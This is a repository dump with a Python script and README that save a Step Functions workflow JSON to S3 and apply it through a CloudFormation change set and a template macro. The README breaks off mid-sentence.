encoder_input: Encoder层Mini-batch输入\n decoder_input: Decoder层Mini-batch输入\n source_vocab_size: Encoder层输入样本字典大小\n target_vocab_size: Decoder层输入样本字典大小\n encoder_embed_dim: Encoder层Embedding维度\n decoder_embed_dim: Decoder层Embedding维度\n encoder_input_seq_len: Encoder层Mini-batch输入样本每个序列的长度\n decoder_input_seq_len: Decoder层Mini-batch输入样本每个序列的长度\n decoder_max_input_seq_len: Decoder层输入样本每批次序列最大长度\n Returns:\n train_decoder_output: Decoder训练结果\n infer_decoder_output: Decoder预测结果 \n '''\n # 得到Encoder层Embedding后的Mini-batch输入\n encoder_embed_input = embedding_encoder_input(encoder_input, source_vocab_size, encoder_embed_dim)\n #print(encoder_embed_input.get_shape())\n #print(encoder_input_seq_len)\n # 构建Encoder模型\n encoder_model = build_encoder_layer(rnn_size, rnn_layer)\n # 获取Encoder状态变量\n _, encoder_state = obtain_encoder_result(encoder_model, encoder_embed_input, encoder_input_seq_len)\n # 获取Decoder输入\n decoder_input = obtain_decoder_input(decoder_input, batch_size)\n # 构建Decoder模型\n 
decoder_model = build_decoder_layer(rnn_size, rnn_layer)\n # 得到Decoder输出\n train_decoder_output, infer_decoder_output = obtain_decoder_result(encoder_state, decoder_model, \n decoder_input, decoder_embed_dim, target_vocab_size, decoder_input_seq_len, decoder_max_input_seq_len)\n return train_decoder_output, infer_decoder_output\n \ndef pad_input(input, pad_int):\n '''\n 补全输入样本\n 使得每批次中各个序列的长度相等\n Params:\n input: Mini-batch样本\n pad_int: 补全符(整型)\n Return:\n pad_input: 补全之后的样本\n '''\n max_len = max([len(item) for item in input])\n pad_input = np.array([item + [pad_int]*(max_len-len(item)) for item in input])\n return pad_input\n \n \ndef obtain_mini_batch(source_vocab_idx, target_vocab_idx, batch_size):\n '''\n 获取Mini-batch输入样本\n Params:\n source_vocab_idx: 输入样本索引列表\n target_vocab_idx: 理论输出索引列表\n batch_size: 每个Mini-batch序列个数\n Return:\n source_input_batch: 生成的输入Mini-batch\n target_input_batch: 对应的理论输出Mini-batch\n source_seq_len: 输入Mini-batch中每个序列的长度\n target_seq_len: 理论输出Mini-batch中每个序列的长度\n '''\n batches = len(source_vocab_idx) // batch_size\n for bat in range(batches):\n start = bat*batch_size\n source_input_batch = source_vocab_idx[start:start+batch_size]\n target_input_batch = target_vocab_idx[start:start+batch_size]\n \n pad_source_input_batch = pad_input(source_input_batch, source_ch_to_int['<PAD>'])\n pad_target_input_batch = pad_input(target_input_batch, target_ch_to_int['<PAD>'])\n \n source_seq_len = []\n target_seq_len = [] \n for source in source_input_batch:\n source_seq_len.append(len(source))\n for target in target_input_batch:\n target_seq_len.append(len(target))\n \n yield pad_source_input_batch, pad_target_input_batch, source_seq_len, target_seq_len\n \ndef build_train_graph():\n '''\n 构建训练图模型\n '''\n train_graph = tf.Graph()\n with train_graph.as_default():\n encoder_input, decoder_input, encoder_input_seq_len, decoder_input_seq_len, decoder_max_input_seq_len = build_input_struct()\n train_decoder_output, infer_decoder_output = build_seq2seq_model(encoder_input, decoder_input,\n source_vocab_size, target_vocab_size,\n encoder_embed_dim, decoder_embed_dim,\n encoder_input_seq_len, decoder_input_seq_len, decoder_max_input_seq_len)\n training_logits = tf.identity(train_decoder_output.rnn_output, 'logits')\n infer_logits = tf.identity(infer_decoder_output.sample_id, 'infer')\n masks = tf.sequence_mask(decoder_input_seq_len, decoder_max_input_seq_len, dtype=tf.float32, name='masks')\n with tf.name_scope('optimization'):\n loss = tf.contrib.seq2seq.sequence_loss(training_logits, decoder_input, masks)\n optimizer = tf.train.AdamOptimizer(learning_rate)\n gradients = optimizer.compute_gradients(loss)\n capped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]\n train_op = optimizer.apply_gradients(capped_gradients)\n return train_graph \n \n \ndef train(source_vocab_idx, target_vocab_idx, batch_size):\n '''\n 开始训练\n '''\n # 将样本分为训练集及验证集\n train_source_vocab_idx = source_vocab_idx[batch_size:]\n train_target_vocab_idx = target_vocab_idx[batch_size:]\n # 其中一个batch_size作为验证集\n valid_source_vocab_idx = source_vocab_idx[:batch_size]\n valid_target_vocab_idx = target_vocab_idx[:batch_size]\n \n checkpoint = \"trained_model.ckpt\"\n with tf.Session(graph=train_graph) as sess:\n sess.run(tf.global_variables_initializer())\n for epo in range(epoches):\n for bat,(source_input_batch, target_input_batch, source_seq_len, target_seq_len) in enumerate( \n obtain_mini_batch(train_source_vocab_idx, train_target_vocab_idx, batch_size)):\n 
#print(source_seq_len)\n _, loss = sess.run(\n [train_op, loss],\n feed_dict={encoder_input: source_input_batch,\n decoder_input: target_input_batch,\n encoder_input_seq_len: source_seq_len,\n decoder_input_seq_len: target_seq_len})\n if bat % print_ans == 0:\n print('Epoch: {:>3f}/{} - Training loss: {:>6.3f}'\n .format(epo, epoches, loss))\n # 保存模型\n saver = tf.train.Saver()\n saver.save(sess, checkpoint)\n print(\"模型训练及保存成功\")\n\ndef build_infer_input(input):\n '''\n 构建预测时的输入样本\n Params:\n input: 原始输入\n Return:\n infer_input_seq: 处理后的输入序列\n '''\n max_infer_seq_length = 7\n infer_input_seq = [source_ch_to_int.get(item, source_ch_to_int['<UNK>']) for item in input] + [source_ch_to_int['<PAD>']*(max_infer_seq_length-len(input))]\n return infer_input_seq\n \ndef infer():\n '''\n 开始预测\n '''\n # 输入一个单词\n input = 'common'\n infer_input_seq = build_infer_input(input)\n\n\n checkpoint = \"./trained_model.ckpt\"\n\n loaded_graph = tf.Graph()\n with tf.Session(graph=loaded_graph) as sess:\n # 加载模型\n loader = tf.train.import_meta_graph(checkpoint + '.meta')\n loader.restore(sess, checkpoint)\n\n encoder_input = loaded_graph.get_tensor_by_name('encoder_input:0')\n logits = loaded_graph.get_tensor_by_name('infer:0')\n encoder_input_seq_len = loaded_graph.get_tensor_by_name('encoder_input_seq_len:0')\n decoder_input_seq_len = loaded_graph.get_tensor_by_name('decoder_input_seq_len:0')\n \n infer_logits = sess.run(logits, {encoder_input: [infer_input_seq]*batch_size, \n encoder_input_seq_len: [len(input)]*batch_size, \n decoder_input_seq_len: [len(input)]*batch_size})[0]\n pad = source_ch_to_int[\"<PAD>\"] \n print('原始输入:', input)\n print('\\nSource')\n print(' Word 编号: {}'.format([i for i in infer_input_seq]))\n print(' Input Words: {}'.format(\" \".join([source_int_to_ch[i] for i in infer_input_seq])))\n print('\\nTarget')\n print(' Word 编号: {}'.format([i for i in infer_logits if i != pad]))\n print(' Response Words: {}'.format(\" \".join([target_int_to_ch[i] for i in infer_logits if i != pad])))\n\n\n\n \nsource_path = 'data/source.txt'\ntarget_path = 'data/target.txt'\n\nsource_vocab_idx, source_vocab_size, source_ch_to_int, source_int_to_ch = build_input(source_path, False)\ntarget_vocab_idx, target_vocab_size, target_ch_to_int, target_int_to_ch = build_input(target_path, True)\n\n#print(source_vocab_idx)\n#print(target_vocab_idx)\n\ntrain_graph = tf.Graph()\nwith train_graph.as_default():\n encoder_input, decoder_input, encoder_input_seq_len, decoder_input_seq_len, decoder_max_input_seq_len = build_input_struct()\n train_decoder_output, infer_decoder_output = build_seq2seq_model(encoder_input, decoder_input,\n source_vocab_size, target_vocab_size,\n encoder_embed_dim, decoder_embed_dim,\n encoder_input_seq_len, decoder_input_seq_len, decoder_max_input_seq_len)\n training_logits = tf.identity(train_decoder_output.rnn_output, 'logits')\n infer_logits = tf.identity(infer_decoder_output.sample_id, 'infer')\n masks = tf.sequence_mask(decoder_input_seq_len, decoder_max_input_seq_len, dtype=tf.float32, name='masks')\n with tf.name_scope('optimization'):\n cost = tf.contrib.seq2seq.sequence_loss(training_logits, decoder_input, masks)\n optimizer = tf.train.AdamOptimizer(learning_rate)\n gradients = optimizer.compute_gradients(cost)\n capped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]\n train_op = optimizer.apply_gradients(capped_gradients)\n\n# 将样本分为训练集及验证集\ntrain_source_vocab_idx = source_vocab_idx[batch_size:]\ntrain_target_vocab_idx = 
target_vocab_idx[batch_size:]\n# 其中一个batch_size作为验证集\nvalid_source_vocab_idx = source_vocab_idx[:batch_size]\nvalid_target_vocab_idx = target_vocab_idx[:batch_size]\n \ncheckpoint = \"./trained_model.ckpt\"\nwith tf.Session(graph=train_graph) as sess:\n sess.run(tf.global_variables_initializer())\n for epo in range(epoches):\n for bat,(source_input_batch, target_input_batch, source_seq_len, target_seq_len) in enumerate( \n obtain_mini_batch(train_source_vocab_idx, train_target_vocab_idx, batch_size)):\n #print(source_seq_len)\n _, loss = sess.run(\n [train_op, cost],\n feed_dict={encoder_input: source_input_batch,\n decoder_input: target_input_batch,\n encoder_input_seq_len: source_seq_len,\n decoder_input_seq_len: target_seq_len}) \n if bat % ITER == 0:\n print('Epoch: {:>3}/{} - Batch: {:>4}/{} - Training loss: {:>6.3f}'\n .format(epo+1, epoches, bat, len(train_source_vocab_idx)//batch_size, loss))\n # 保存模型\n saver = tf.train.Saver()\n saver.save(sess, checkpoint)\n print(\"模型训练及保存成功\")\n \n print(\"开始预测\")\n infer()" }, { "alpha_fraction": 0.6372548937797546, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 13.714285850524902, "blob_id": "3920cd47906bcf2b58bb7007d8fc5b8ca61120ae", "content_id": "af527da019098e80c3b3ffdefa1e25c56c793e61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 24, "num_lines": 7, "path": "/data/gen_data.py", "repo_name": "Yang-shihong/Chat", "src_encoding": "UTF-8", "text": "#! /usr/bin/python3\n\nfrom xeger import Xeger\n\ngen = Xeger(limit=26)\nch = gen.xeger(r'[a-z]')\nprint(ch)" }, { "alpha_fraction": 0.5617977380752563, "alphanum_fraction": 0.601123571395874, "avg_line_length": 13.833333015441895, "blob_id": "7700418d6c05ca9c35bb458ff33dec1dd933cbde", "content_id": "b02b5584f9ab08d55b31404f4fe818b8ca158047", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 486, "license_type": "no_license", "max_line_length": 23, "num_lines": 24, "path": "/README.md", "repo_name": "Yang-shihong/Chat", "src_encoding": "UTF-8", "text": "# Chat\n一步一步开发一个ChatBot\n# 开发环境\n - python-3.5.2\n - jieba-0.39\n - tensorflow-1.7.0\n# Step 1: 中文分词\n - 中文分词原理\n - DAG图构建\n - 动态规划算法\n - 新词发现原理\n - HMM模型\n - Viterbi算法\n# Step 2: Word2Vec\n - Huffman编码\n - 神经网络模型\n - CBOW模型\n - Skip-gram模型\n - 模型训练算法\n - Hierarchical\n - Negative Sampling\n# Step 3: Seq2Seq模型\n - LSTM模型\n - Encoder-Decoder模型\n" }, { "alpha_fraction": 0.5567567348480225, "alphanum_fraction": 0.6648648381233215, "avg_line_length": 17.600000381469727, "blob_id": "884c5507bbda4b443405b3298aebbadb70815455", "content_id": "177e54f8eccd76f6375aaa64e5e028143e08bec5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 253, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/ChatBot/README.md", "repo_name": "Yang-shihong/Chat", "src_encoding": "UTF-8", "text": "# Chat(V1)\n一步一步开发一个ChatBot\n# 开发环境\n - python-3.6.4\n - jieba-0.39\n - tensorflow-1.8.0\n - flask-0.12.2\n# 使用说明\n 1. 命令行启动web服务 python chat_web.py\n 2. 浏览器访问 http://localhost:5000 进入聊天页面" } ]
6
gford1000-aws/step-function-workflow-updater
https://github.com/gford1000-aws/step-function-workflow-updater
594c6b842c243031417b53b44737ba193d4b77d5
80620ef3f1d062f0b74e1e15c5af5a2c522c93b5
bd431500844cef63b26df5af0540bb768fa16fc0
refs/heads/master
2020-04-10T19:03:42.883653
2018-12-10T19:54:33
2018-12-10T19:54:33
161,221,397
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7283482551574707, "alphanum_fraction": 0.7326786518096924, "avg_line_length": 42.106666564941406, "blob_id": "1c84ab86e0e99f9b8d9d5b3c2f4a56096afaf090", "content_id": "07d71c113c8e9c8c35507f2bc585459e21be1afb", "detected_licenses": [ "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12932, "license_type": "permissive", "max_line_length": 188, "num_lines": 300, "path": "/deploy_step_function_workflow.py", "repo_name": "gford1000-aws/step-function-workflow-updater", "src_encoding": "UTF-8", "text": "\"\"\" ---------------------------------------------------------------------------\n\n\tFile: deploy_step_function_workflow.py\n\n\tDescription:\n\t------------\n\n\tTrigger an update to an existing CloudFormation Stack whenever a new Step Function workflow is changed.\n\n\tIdea is that this script can be added as a commit hook for workflow JSON changes, so that CloudFormation\n\tcan be used to manage the StateMachine via ChangeSets as the workflows change.\n\n\tPrinciples:\n\t-----------\n\n\tUpdates to workflows should be performed via CloudFormation to have a consistent and auditable \n\tdeployment strategy (rather than say, by a direct call to boto3.client('stepfunctions').update_state_machine() ).\n\n\tSeparate the creation/changes of Step Function workflows, which will be managed by the dev team as part \n\tof application development, from the infrastructure that the application is running within \n\t(i.e. StateMachine and other AWS resources), to minimise IAM privileges needed by dev team.\n\n\tOnly the team managing CloudFormation should have access to Macros, since these can potentially change any part of a\n\tCloudFormation template.\n\n\tApproach:\n\t---------\n\n\tSince the workflow is a string based attribute of the StateMachine CloudFormation resource type,\n\ta macro is required to load the revised workflow as JSON, stringify it, and then update the CloudFormation\n\ttemplate with the change. This is achieved using a CloudFormation ChangeSet which receives the\n\tsame template each time, but the presence of the macro triggers the ChangeSet to execute the underlying\n\tLambda function to check for changes - the Lambda then loads the JSON and updates the template with the new details.\n\n\tThe required macro Stack is created via 'inject_workflow_macro.cform' (which includes the Lambda as embedded python).\n\n\tExample:\n\t--------\n\n\tAn example template that supports updates is 'step_function_workflow_updater.cform', which creates a single\n\tStateMachine and its associated Role, returning the AWS Arns of both resources. 
The Role Arn is useful so that \n\tits policies can be updated, dependent on the workflow that the StateMachine will execute - by default the Role \n\thas no access to any AWS resources.\n\n\tAn example workflow JSON file is 'hello.json', which declares a trivial hello world workflow.\n\n\tOnce the macro stack has been created (using the default parameters), then create the StateMachine stack using the\n\tCloudFormation console with a stack name of your choice.\n\n\tThen updating the stack to use the workflow JSON in hello.json is a call:\n\n\tpython deploy_step_function_workflow.py \n\t\t-b <YOUR S3 BUCKET> \n\t\t-k hello.json -f hello.json \n\t\t-s <YOUR STACK NAME>\n\t\t-t step_function_workflow_updater.cform \n\t\t-d \"A description of the ChangeSet - for example, this could be the commit id of the hello.json file\"\n\n\"\"\"\n\nimport boto3\nimport json\nimport os.path\nimport time\nimport uuid\n\ndef _check_parameters(param_name, param_value, post_check_fn_list=None):\n\tif param_value == None:\n\t\traise Exception(\"{} must not be None\".format(param_name))\n\tif not isinstance(param_value, (str, unicode)):\n\t\traise Exception(\"{} must be a str or unicode value\".format(param_name))\n\tif post_check_fn_list:\n\t\tif isinstance(post_check_fn_list, list):\n\t\t\tfor fn in post_check_fn_list:\n\t\t\t\tfn(param_name, param_value)\n\t\telse:\n\t\t\tpost_check_fn_list(param_name, param_value)\n\ndef _check_file_exists(param_name, param_value):\n\tif not os.path.isfile(param_value): \n\t\traise Exception(\"Specified file '{}' does not exist or is not a file\".format(param_value))\t\t\n\ndef save_workflow_to_s3(**kwargs):\n\t\"\"\"\n\tSaves the contents of the SourceFileName to the specified Key in Bucket\n\n\tParameters:\n\n\t\tBucket \t\t\tThe name of the bucket\n\t\tKey \t\t\tThe key to store the workflow within the bucket\n\t\tSourceFileName\tThe location of the file containing the workflow\n\t\tS3StorageClass\tThe type of S3 storage. 
Must be one of STANDARD|STANDARD_IA|ONEZONE_IA\n\n\tReturns:\n\n\t\tNothing\n\n\t\"\"\"\n\tdef check_bucket_exists(param_name, param_value):\n\t\tclient = boto3.client('s3')\n\t\tfor bucket_info in client.list_buckets()[\"Buckets\"]:\n\t\t\tif bucket_info[\"Name\"] == param_value:\n\t\t\t\treturn\n\n\t\traise Exception(\"Specified bucket '{}' does not exist\".format(param_value))\n\n\tdef check_storage_class(param_name, param_value):\n\t\tif param_value not in [ \"STANDARD\", \"STANDARD_IA\", \"ONEZONE_IA\" ]:\n\t\t\traise Exception(\"{} must be one of [STANDARD|STANDARD_IA|ONEZONE_IA]\".format(param_name))\n\n\tif kwargs is None:\n\t\traise Exception(\"Incorrect parameters supplied to save_workflow_to_s3()\")\n\n\t# Check parameters\n\t_check_parameters(\"Bucket\", kwargs.get(\"Bucket\", None), check_bucket_exists)\n\t_check_parameters(\"Key\", kwargs.get(\"Key\", None))\n\t_check_parameters(\"SourceFileName\", kwargs.get(\"SourceFileName\", None), _check_file_exists)\n\t_check_parameters(\"S3StorageClass\", kwargs.get(\"S3StorageClass\", None), check_storage_class)\n\n\t# Upload file to S3\n\tclient = boto3.client('s3')\n\tclient.put_object(\n\t\tBucket=kwargs[\"Bucket\"],\n\t\tKey=kwargs[\"Key\"],\n\t\tBody=open(kwargs[\"SourceFileName\"], \"r\"),\n\t\tContentType=\"application/json\",\n\t\tStorageClass=\"STANDARD\")\n\ndef update_stack(**kwargs):\n\t\"\"\"\n\tCreates a ChangeSet and then Executes if changes are detected.\n\n\tUsing a ChangeSet ensures that Macros are re-executed, to detect all changes, in this case\n\tthe modification to the StateMachine workflow saved to S3\n\n\tParameters:\n\n\t\tStackName\t\t\t\t\tThe name of the stack to be updated. Stack must already exist and be updateable\n\t\tTemplateFileName\t\t\tThe location of the template with which to update the stack.\n\t\tS3KeyParameterName\t\t\tThe name of the parameter that identifies the S3 object key holding the revised workflow\n\t\tS3Key \t\t\t\t\t\tThe S3 key to assign to the S3KeyParameter\n\t\tSMResourceParameterName\t\tThe name of the parameter that identifies the StateMachine resource to be updated\n\t\tSMResource \t\t\t\t\tThe logical resource name to assign to the SMResourceParameter\n\t\tDescription \t\t\t\tThe description for this stack update\n\n\tReturns:\n\n\t\tNothing\n\n\t\"\"\"\n\n\tdef check_stack_exists_and_updatable(param_name, param_value):\n\t\tclient = boto3.client('cloudformation')\n\t\tresp = client.list_stacks(StackStatusFilter=[\"CREATE_COMPLETE\", \"UPDATE_COMPLETE\"])\n\t\tcont = True\n\t\twhile cont:\n\t\t\tfor stack in resp[\"StackSummaries\"]:\n\t\t\t\tif stack[\"StackName\"] == param_value:\n\t\t\t\t\treturn # Exists and ready for update\n\t\t\tnext_token = resp.get(\"NextToken\", None)\n\t\t\tif next_token:\n\t\t\t\tresp = client.list_stacks(StackStatusFilter=[\"CREATE_COMPLETE\", \"UPDATE_COMPLETE\"], NextToken=next_token)\n\t\t\telse:\n\t\t\t\tcont = False\n\t\traise Exception(\"Specified Stack '{}'' either does not exist or is not ready for update\".format(param_value))\n\n\tdef check_template_params_exist(param_name, param_value):\n\t\ttemplate = json.load(open(param_value, \"r\"))\n\t\ttemplate_parameters = template.get(\"Parameters\", {})\n\t\tfor template_param_name in [kwargs[\"S3KeyParameterName\"], kwargs[\"SMResourceParameterName\"]]:\n\t\t\tif template_parameters.get(template_param_name, None) == None:\n\t\t\t\traise Exception(\"Parameter '{}' not present in template '{}'\".format(template_param_name, param_value))\n\t\t\telse:\n\t\t\t\tdel 
template_parameters[template_param_name]\n\n\t\tif len(template_parameters):\n\t\t\t# Error if further parameters in the template, with no default value\n\t\t\tfor k, v in template_parameters.viewitems():\n\t\t\t\tif v.get(\"Default\", None) == None:\n\t\t\t\t\traise Exception(\"Additional parameters in template '{}' without defaults (e.g. '{}')\".format(param_value, k))\n\n\tdef wait_for_change_set(change_set_id):\n\t\tresp = client.describe_change_set(ChangeSetName=change_set_id)\n\t\tsleep_time = 2\n\t\twhile resp['Status'] not in [\"CREATE_COMPLETE\", \"FAILED\"]:\n\t\t\ttime.sleep(sleep_time)\n\t\t\tsleep_time = sleep_time * 2 # To avoid throttling errors due to too many calls to describe_change_set\n\t\t\tresp = client.describe_change_set(ChangeSetName=change_set_id)\n\t\treturn resp\n\n\tif kwargs is None:\n\t\traise Exception(\"Incorrect parameters supplied to save_workflow_to_s3()\")\n\n\t# Check parameters\n\t_check_parameters(\"StackName\", kwargs.get(\"StackName\", None), check_stack_exists_and_updatable)\n\t_check_parameters(\"TemplateFileName\", kwargs.get(\"TemplateFileName\", None), [_check_file_exists, check_template_params_exist])\n\t_check_parameters(\"S3KeyParameterName\", kwargs.get(\"S3KeyParameterName\", None))\n\t_check_parameters(\"S3Key\", kwargs.get(\"S3Key\", None))\n\t_check_parameters(\"SMResourceParameterName\", kwargs.get(\"SMResourceParameterName\", None))\n\t_check_parameters(\"SMResource\", kwargs.get(\"SMResource\", None))\n\n\t# Create ChangeSet for the Stack\n\tprint 'Creating Change Set'\n\tclient = boto3.client('cloudformation')\n\tresp = client.create_change_set(\n\t\tStackName=kwargs[\"StackName\"],\n\t\tTemplateBody=open(kwargs[\"TemplateFileName\"], \"r\").read(),\n\t\tParameters=[\n\t\t\t\t{\n\t\t\t\t\t\"ParameterKey\" : kwargs[\"S3KeyParameterName\"],\n\t\t\t\t\t\"ParameterValue\" : kwargs[\"S3Key\"],\n\t\t\t\t\t\"UsePreviousValue\" : False\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"ParameterKey\" : kwargs[\"SMResourceParameterName\"],\n\t\t\t\t\t\"ParameterValue\" : kwargs[\"SMResource\"],\n\t\t\t\t\t\"UsePreviousValue\" : False\n\t\t\t\t}\n\t\t\t],\n\t\tCapabilities=[\"CAPABILITY_IAM\", \"CAPABILITY_NAMED_IAM\"],\n\t\tDescription=kwargs[\"Description\"],\n\t\tChangeSetName='A'+''.join(str(uuid.uuid4()).split(\"-\")),\n\t\tChangeSetType=\"UPDATE\")\n\n\t# Determine state of the ChangeSet\n\tprint 'Waiting on Change Set creation'\n\tchange_set_id = resp['Id']\n\tresp = wait_for_change_set(change_set_id)\n\n\t# Validate the expected StateMachine resource is being updated\n\tprint 'Validating Change Set status'\n\n\tif resp[\"Status\"] == \"FAILED\":\n\t\traise Exception(\"ChangeSet '{}' creation FAILED - '{}'\".format(change_set_id, resp[\"StatusReason\"]))\n\n\tfound_required_change = False\n\tfor chg in resp['Changes']:\n\t\tif chg['ResourceChange']['LogicalResourceId'] == kwargs[\"SMResource\"]:\n\t\t\t# The target StateMachine will be updated\n\t\t\tfound_required_change = True\n\t\t\tbreak\n\n\tif not found_required_change:\n\t\traise Exception(\"ChangeSet '{}' does not modify StateMachine '{}' - check workflow file\".format(change_set_id, kwargs[\"SMResource\"]))\n\n\t# Execute Change Set to apply the changes\n\tprint 'Applying Change Set'\n\tclient.execute_change_set(ChangeSetName=change_set_id)\n\n\tprint 'Waiting on Change Set execution'\n\tresp = wait_for_change_set(change_set_id)\n\n\tif resp[\"Status\"] == \"FAILED\":\n\t\traise Exception(\"ChangeSet '{}' execution FAILED - '{}'\".format(change_set_id, resp[\"StatusReason\"]))\n\n\tif 
resp[\"ExecutionStatus\"] != \"AVAILABLE\":\n\t\traise Exception(\"ChangeSet '{}' execution status is '{}'\".format(change_set_id, resp[\"ExecutionStatus\"]))\n\n\tprint 'Update has completed successfully'\n\ndef update_workflow(**kwargs):\n\t\"\"\"\n\tUpdates S3 and then updates the stack\n\t\"\"\"\n\tprint 'Saving updated Workflow'\n\tsave_kwargs = {k:v for k,v in filter(lambda t: t[0] in [\"Bucket\", \"Key\", \"SourceFileName\", \"S3StorageClass\"], kwargs.items()) }\n\tsave_workflow_to_s3(**save_kwargs)\n\n\tprint 'Updating StateMachine stack'\n\tupdate_kwargs = {k:v for k,v in filter(lambda t: t[0] in [\"StackName\", \"Description\", \"TemplateFileName\", \"S3KeyParameterName\", \"SMResourceParameterName\", \"SMResource\"], kwargs.items()) }\n\tupdate_kwargs[\"S3Key\"] = \"s3://{}/{}\".format(kwargs[\"Bucket\"], kwargs[\"Key\"])\n\tupdate_stack(**update_kwargs)\n\nif __name__ == \"__main__\":\n\timport argparse\n\tparser = argparse.ArgumentParser(description=\"Demos how a commit hook on workflow JSON file changes could trigger a CloudFormation update of the State Machine\")\n\tparser.add_argument(\"-b\", \"--Bucket\", help=\"S3 bucket which stores the workflow JSON files\", required=True)\t\n\tparser.add_argument(\"-k\", \"--Key\", help=\"S3 key which identifies the workflow JSON file\", required=True)\t\n\tparser.add_argument(\"-f\", \"--SourceFileName\", help=\"Filename of the workflow JSON to be saved to S3\", required=True)\n\tparser.add_argument(\"-d\", \"--Description\", help=\"Description of the ChangeSet to the Stack (e.g. Commit)\", default=\"\")\n\tparser.add_argument(\"-s\", \"--StackName\", help=\"Name of the Stack to be updated\", required=True)\n\tparser.add_argument(\"-t\", \"--TemplateFileName\", help=\"Filename of the template of the Stack to be updated\", required=True)\n\tparser.add_argument(\"-c\", \"--S3StorageClass\", help=\"S3 storage class to use for the JSON workflow file\", default=\"STANDARD\")\n\tparser.add_argument(\"-p1\", \"--S3KeyParameterName\", help=\"Name of S3Key parameter in the Stack template\", default=\"S3Key\")\n\tparser.add_argument(\"-p2\", \"--SMResourceParameterName\", help=\"Name of StateMachine parameter in the Stack template\", default=\"SMResource\")\n\tparser.add_argument(\"-v2\", \"--SMResource\", help=\"Name of StateMachine resource in the Stack template, to assign to SMResourceParameterName\", default=\"MyStateMachine\")\n\n\targs = parser.parse_args()\t\n\n\tupdate_workflow(\n\t\tBucket=args.Bucket,\n\t\tKey=args.Key,\n\t\tSourceFileName=args.SourceFileName,\n\t\tS3StorageClass=args.S3StorageClass,\n\t\tStackName=args.StackName,\n\t\tDescription=args.Description,\n\t\tTemplateFileName=args.TemplateFileName,\n\t\tS3KeyParameterName=args.S3KeyParameterName,\n\t\tSMResourceParameterName=args.SMResourceParameterName,\n\t\tSMResource=args.SMResource)\n" }, { "alpha_fraction": 0.6541084051132202, "alphanum_fraction": 0.6597340703010559, "avg_line_length": 64.17778015136719, "blob_id": "9422fc31ec688dd7fde3dbb65cce770811fb6377", "content_id": "122872fd81d3eeabd1d67ec3962501fc97855543", "detected_licenses": [ "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5866, "license_type": "permissive", "max_line_length": 308, "num_lines": 90, "path": "/README.md", "repo_name": "gford1000-aws/step-function-workflow-updater", "src_encoding": "UTF-8", "text": "# step-function-workflow-updater\n\nIt is often desirable to separate the ability of development teams 
between writing application code (consuming data from infrastructure\nresources and creating new data, to be stored in other resources or returned to callers) from the management of the underlying \ninfrastructure itself.\n\nWith serverless programming in AWS Lambda and AWS StepFunctions, this means that dev teams need to be able to create and deploy Lambdas\n(stateless application code) and StateMachine workflows (which orchestrate the Lambda invocation sequence), whilst ensuring\nseparate control of the infrastructure resources (DBs, StateMachines etc.) and the data within them (via IAM policies).\n\nThis repo provides an example of how to achieve this, whereby the JSON definition of the workflow can be managed outside of its \ndeployment via CloudFormation, so that the separation of security privilege can be maintained.\n\nThe approach leverages the use of CloudFormation [macros](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/template-macros.html) to inject the new workflow JSON into the StateMachine resource as part of a CloudFormation Change Set.\n\nArtefacts in the repo:\n\n* __[inject_workflow_macro.cform](inject_workflow_macro.cform)__ which deploys the macro. \n\n* __[step_function_workflow_updater.cform](step_function_workflow_updater.cform)__ which is a basic CloudFormation template that can \ndeploy a stack containing a StateMachine and its associated IAM Role\n\n* __[deploy_step_function_workflow.py](deploy_step_function_workflow.py)__ which is a helper script to manage updates to stacks containing a\nStateMachine, whenever its associated workflow definition is changed. This script will save the JSON workflow to S3 and then create a new\nChange Set in CloudFormation, prior to execution. The idea is that this script can be used as a commit hook for workflow updates.\n\n## inject_workflow_macro.cform\n\nThis is a simple Cloudformation template to declare the Lambda and associate it with the Cloudformation Macro:\n\n![alt text](https://github.com/gford1000-aws/step-function-workflow-updater/blob/master/inject%20workflow%20macro.png \"Script per designer\")\n\n### Arguments\n\n| Argument | Description |\n| ---------------------------- |:---------------------------------------------------------------------------:|\n| MacroName | Name of the Cloudformation Macro, as used in other templates |\n| WorkflowBucketName | Bucket which will contain the JSON workflows to be injected |\n| MacroLogTTL | TTL of CloudWatch logs for the Lambda function |\n\n\n### Outputs\n\n| Output | Description |\n| ----------------------- |:--------------------------------------------------------------:|\n| MacroName | The name of Macro |\n\n\n### Notes\n\n* The macro will traverse the internet to access the specified S3 key; to prevent this, operate the Lambda within a VPC. [https://github.com/gford1000-aws/lambda_s3_access_using_vpc_endpoint](https://github.com/gford1000-aws/lambda_s3_access_using_vpc_endpoint) provides an example of how to achieve this. 
\n* The macro retrieves the workflow JSON data, based on the value of the `S3Key` parameter which must be present in the template and which is expected to be of the form `s3://BUCKET_NAME/KEY`)\n* The macro updates a StateMachine resource in the template, according to the resource identified by the value of the `SMResource` parameter which must be present in the template.\n* The macro is linked to an \n[alias](https://docs.aws.amazon.com/lambda/latest/dg/versioning-aliases.html) rather than the Lambda itself - this allows the Lambda to be easily changed/tested if required.\n* The created role provides full read access to the specified bucket - this scope should reduced if the bucket is used for other activities.\n\n\n## step_function_workflow_updater.cform\n\nThis is a trivial Cloudformation template to declare the Lambda and associate it with the Cloudformation Macro:\n\n![alt text](https://github.com/gford1000-aws/step-function-workflow-updater/blob/master/step%20function%20workflow%20updater.png \"Script per designer\")\n\n### Arguments\n\n| Argument | Description |\n| -------------------- |:---------------------------------------------------------------------------:|\n| S3Key | Key to the object containing the JSON workflow to be injected |\n| SMResource | Name of the template StateMachine resource to be modified |\n\n\n### Outputs\n\n| Output | Description |\n| ----------------------- |:--------------------------------------------------------------:|\n| StateMachineArn | The Arn of the StateMachine, so it can be executed |\n| RoleArn | The Arn of the StateMachine Role, so it can be updated |\n\n\n### Notes\n\n* The RoleArn is returned so that policies can be 